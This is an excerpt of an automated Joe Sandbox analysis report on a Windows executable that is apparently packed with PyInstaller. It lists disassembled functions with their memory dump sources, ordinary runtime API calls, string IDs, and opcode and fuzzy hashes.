                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                        • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction ID: a102679c207bf8e8a0f28fad2fd7a5f3d7ad7702f2b82e44d499fd2343d61ec9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4219572A1C78192E710EB50B841BE6A3A4FB887C4FA00131FE8D83659EF7CD949C751
                                                                                                                                                                                                                                        Function 00007FF78DA69AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                        • Instruction ID: 72ab25b0d785d11fd6e1115f2063ef642eb6c8d33b7a82586a82b6a73e8a1e5c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0F0C261B0C70681FB10AB20E458B7A9360FF44765FB40235CAAE465E4EF2CD84CC321
                                                                                                                                                                                                                                        Function 00007FF78DA793D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                        • Instruction ID: 15a373ea790007850609579bdeb63ce8226cffa9262739aecab754e36569cde9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A111C172F0CA1301F6547128D466B75A0547F98370FB40636EAEE262D6EE2CAC49C126
                                                                                                                                                                                                                                        Function 00007FF78DA6B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B41F
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B43E
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B466
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B477
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B488
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                        • Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                                        • Instruction ID: fe87278cb7da941245cb79dc62f6292f1cff67440d182af6861ec121ca6d04b5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75115C20B0D602C1FA58B3A27555979E141BF447B0FB48334E83D466DAFE2CEC49C222
                                                                                                                                                                                                                                        Function 00007FF78DA6B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                        • Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                                        • Instruction ID: 85655f259aa023c54758b4078fda7fe78358ebd9714d0946d7aabd247445cf6c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2110620B0D207C1FAA876B2645197AA2817F55720FF45734D93E4A6D2FD2DFC09C223
                                                                                                                                                                                                                                        Function 00007FF78DA66010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                        • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                        • Instruction ID: a2ede9d1c40c8363dc97e4369c3a2cb868ff64512b51aec2ba9cb082f43d56b7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B591B122A0CA46C1E761AFA5E450B7DB399BB40B54FB84175DA4A432C5EF3CEC49C323
                                                                                                                                                                                                                                        Function 00007FF78DA6FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                        • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                        • Instruction ID: a08d9f6ad2b8ab32efdd35c8a0f8b11403c0644155585d673b93b4585291199d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5481C472D0D242C5F7656EA9E110A78BAA0BB11B48FF54035DA0987689FF2DFD09C323
                                                                                                                                                                                                                                        Function 00007FF78DA5D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                        • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction ID: 29a24ee05253321d072c1ef32378a92ee49d4d47cac94239ae5a4f9535a6faa5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6519E22A1D6028ADF14AB55E444E38A7A1FB44B98FB48134DA5A87788EF3CEC45C711
                                                                                                                                                                                                                                        Function 00007FF78DA5EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                        • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                        • Instruction ID: cef95d814d5090ea8165d9027591160ace73f64f7c003eadcb86ff98093d5a5a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1361B03290CBC081EB20AB55E440BAAB7B0FB84B84F644225EB9C43B95EF3CD594CB11
                                                                                                                                                                                                                                        Function 00007FF78DA5F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                        • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                        • Instruction ID: 6f3e5ac5dfa9f89d4ffd3f71bae9a5a7fba8d825ad10f50285522984829bb87b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C51A43290C28286EB64AF619044B78B7B0FB54B94FB44235DA5D87795EF3CE854C712
                                                                                                                                                                                                                                        Function 00007FF78DA57E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF78DA5352C,?,00000000,00007FF78DA53F23), ref: 00007FF78DA57F22
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                        • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                        • Instruction ID: 415e8dd1376490eaa2bf89541c392b936f9685d8d46cd9595350dcc6c6619958
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C331EB2161DAC145EA21A710E410BBAA364FB44BD4FB00230EE6D877C9FE2CD909C711
                                                                                                                                                                                                                                        Function 00007FF78DA52810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                        • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction ID: ee63d275ee30840ba70978b0387a4ed20197289781e89d4d8cee318743aaeffa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B21916270CB4182E710AB54B444BEAA3A4FB88784FA04135EA8D9765AEF3CDA49C751
                                                                                                                                                                                                                                        Function 00007FF78DA6C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                        • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction ID: c2108a0d336869aac9ce2a27365cbd8d62e6254611d2b38c20fb4f9fd00c719e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DD12872B1CA40C9E710EFA5E8405AC7B71FB54798BB08235DE5D97B89EE38D80AC351
                                                                                                                                                                                                                                        Function 00007FF78DA6F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
